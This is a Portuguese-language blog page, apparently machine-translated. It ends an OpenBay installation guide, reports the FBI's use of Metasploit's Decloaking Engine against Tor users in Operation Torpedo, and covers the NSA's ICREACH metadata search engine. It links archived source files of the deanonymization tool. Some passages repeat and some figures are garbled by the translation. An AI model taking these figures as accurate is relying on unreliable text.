Esta opção está disponível por padrão no pacote source original.
Você pode vê-lo em conf/example.htaccess

Nginx

Esta configuração está disponível no pacote fonte original em /conf/example.nginx.conf

Sphinx (modo avançado)
https://github.com/isohuntto/openbay/wiki/sphinx

MySQL (modo avançado)
Antes executar, você precisa criar uma base de dados, o esquema da base de dados será criado pelo assistente. Dump SQL caminho:  /src/protected/data/schema.mysql.sql

Passo 5. prosseguindo 

Parabéns! Agora você pode abrir o seu nome de domínio com qualquer navegador e siga o guia fornecida lá. Como padrão, você terá que colocar o título da página que vai aparecer em todas as suas páginas.

Instruções detalhadas aqui
https://github.com/isohuntto/openbay/wiki/shared-hosting-guide


Apache > = 2. *
PHP versão > = 5,3, com os módulos instalados: DOP, PDO_MYSQL
Qualquer nome de domínio
Engine Sphinx > = 2,1
MySQL > = 5. *

quinta-feira, 18 de dezembro de 2014

FBI usa Metasploit Decloak Para expor os usuários TOR.

Metasploit, uma criação de um hacker(H.D. Moore)  white hat em 2003, foi o mais procuradoa ferramenta de hacking por quase uma década; uma espécie de canivete suíço de hacks que permite que um hacker vasculhe  redes de clientes.  A ferramenta é tão útil  que até mesmo FBI não poderia ficar longe dela. De acordo com um relatório recente da WIRED, FBI usou um código Flash a partir de um projeto paralelo Metasploit abandonado "Decloaking Engine" para identificar os suspeitos que se escondem atrás do anonimato da rede TOR. Decloaking Engine - "Esta ferramenta demonstra um sistema que identifica o endereço IP real de um usuário da web, independentemente das configurações de proxy, usando uma combinação de tecnologias do lado do cliente e serviços personalizados, Usa como componentes JAVA e FLASH Para ser executado lado cliente."


Metasploit, uma criação de um hacker(H.D. Moore)  white hat em 2003, foi o mais procuradoa ferramenta de hacking por quase uma década; uma espécie de canivete suíço de hacks que permite que um hacker vasculhe  redes de clientes.

A ferramenta é tão útil  que até mesmo FBI não poderia ficar longe dela. De acordo com um relatório recente da WIRED, FBI usou um código Flash a partir de um projeto paralelo Metasploit abandonado "Decloaking Engine" para identificar os suspeitos que se escondem atrás do anonimato da rede TOR.
Decloaking Engine - "Esta ferramenta demonstra um sistema que identifica o endereço IP real de um usuário da web, independentemente das configurações de proxy, usando uma combinação de tecnologias do lado do cliente e serviços personalizados, Usa como componentes JAVA e FLASH
Para ser executado lado cliente."


JAVA::    https://web.archive.org/web/20110314002349/http://decloak.net/HelloWorld.java
FLASH:https://web.archive.org/web/20110723083748/http://decloak.net/Decloak.hx

A ferramenta foi utilizada em "Operation Torpedo", uma operação policial visando três usuários dos sites da DarkNet/DW de pornografia infantil. Um advogado de um dos réus está agora desafiando a confiabilidade do hackerware como uma evidência científica admissível no Supremo Tribunal Federal.

O assunto será tratado em tribunal em 23 de fevereiro de 2015.

Tor, um projeto livre, de código aberto, é um software de anonimato que protege os usuários por roteamento de tráfego por meio de conexões criptografadas. Ele é bastante popular entre os criminosos, ativistas de direitos humanos, ativistas, jornalistas, hacking e denunciantes.
O software processa um servidor web inútil para as autoridades de aplicação da lei, porque enfatiza a informação muito limitada sobre um usuário para o nó Tor mais próximo.

Metasploit, criado em 2003, é um open-source ferramenta de teste de penetração que permite aos usuários organizar e efetuar ataques de componentes. Mais tarde, em 2006, Moore lançou o "Metasploit Decloaking Engine," Com cinco truques, para romper sistemas de anonimato.
No entanto, qualquer erro exporia a identidade do utilizador.

Decloaking Engine, como implantação de spyware, é bastante leve e foi usado contra cada visitante do site, um caso de implantação de spyware em massa. A Conferência Judicial dos Estados Unidos está trabalhando em uma petição do Departamento de Justiça para permitir explicitamente implantações de spyware.

Enquanto isso está acontecendo, capacidades anti-tor do FBI realmente melhoraram de forma alarmante.

"No curso de nove meses, eles foram de fora as técnicas de Flash que simplesmente se aproveitam da falta de proteção proxy, para explorações do navegador custom-built", diz Chris Soghoian, principal tecnólogo na ACLU.

http://hackread.com/fbi-used-metasploit-decloak-expose-tor-users/

quarta-feira, 17 de dezembro de 2014

NSA tem o seu próprio motor de busca de metadados


NSA tem o seu próprio motor de busca de metadados
NSA supostamente desenvolveu um motor de busca para procurar metadados e compartilhá-lo com outras agências governamentais americanas, incluindo o FBI e DEA. O Intercept informou que com base nos documentos vazados do denunciante Edward Snowden.

O motor de busca tem ICREACH(Seu nome é baseado no acrônimo para a Intelligence Community Reach) e é capaz de pesquisar através de 860.000.000.000 entradas de dados sobre chamadas telefônicas, e-mails, faxes, mensagens de texto, locais de telefone celular e conversas de bate-papo on-line. Mais de 1.000 analistas e 23 agências governamentais têm acesso ao motor de busca.

ICREACH foi projetado para ser adequado para a partilha dos dados secretos de vigilância nos EUA e é capaz de lidar com 2-5000000000 novas entradas de dados todos os dias. As informações coletadas, o que é essencialmente derivada de comunicações estrangeiras de vigilância, é composto por mais de 30 tipos diferentes de metadados. Especialistas legais estão alarmados com o tamanho do motor de busca e temem que as informações sejam utilizado para investigações não-relacionados com o terrorismo, que não é muita novidade para o cenário  investigativo NSA.


ICREACH foi projetado para ser adequado para a partilha dos dados secretos de vigilância nos EUA e é capaz de lidar com 2-5000000000 novas entradas de dados todos os dias. As informações coletadas, o que é essencialmente derivada de comunicações estrangeiras de vigilância, é composto por mais de 30 tipos diferentes de metadados. Especialistas legais estão alarmados com o tamanho do motor de busca e temem que as informações sejam utilizado para investigações não-relacionados com o terrorismo, que não é muita novidade para o cenário  investigativo NSA.


Revelações anteriores que tem origem nos documentos Snowden expuseram uma infinidade de programas da NSA para que recolhem grandes volumes de comunicações. A NSA reconheceu que compartilha alguns de seus dados coletados com agências nacionais, como o FBI, mas os detalhes sobre o método e seu âmbito de partilha permaneceram envolto em segredo.

Revelações anteriores que tem origem nos documentos Snowden expuseram uma infinidade de programas da NSA para que recolhem grandes volumes de comunicações. A NSA reconheceu que compartilha alguns de seus dados coletados com agências nacionais, como o FBI, mas os detalhes sobre o método e seu âmbito de partilha permaneceram envolto em segredo.

ICREACH tem sido acessível a mais de 1.000 analistas em 23 agências do governo dos EUA que realizam trabalho de inteligência, de acordo com um memorando de 2010. Um documento de planejamento a partir de 2007 lista o DEA, FBI, CIA e da Agência de Inteligência de Defesa, como membros do núcleo. Informação divulgada através ICREACH pode ser usado para rastrear os movimentos de pessoas, mapear suas redes de associados, ajudar a prever ações futuras e potencialmente revelar afiliações religiosas ou convicções políticas.

A criação do ICREACH representou um momento marcante na história da das classificadas redes de vigilância do governo dos EUA, de acordo com os documentos da NSA.

Em uma declaração sobre as interceptações, o Escritório do Diretor de Inteligência Nacional USA confirmou que os dados do sistema que é varrido por programas autorizados nos termos da Ordem Executiva 12333, uma directiva presidencial controversa Reagan-era que sustenta várias operações de vigilância em massa da NSA que monitoram comunicações no exterior. A vigilância 12333 ocorre sem supervisão judicial e recebeu escrutínio do Congresso mínima porque ele é direcionado a, redes de comunicação estrangeiros, não domésticos. Mas a ampla escala de 12333 vigilância significa que as comunicações alguns americanos pegos na varredura.

Referencias:
http://fr.wikipedia.org/wiki/ICREACH
http://blog.scanarch.com/nsa-has-its-own-search-engine-for-metadata/
https://firstlook.org/theintercept/2014/08/25/icreach-nsa-cia-secret-google-crisscross-proton/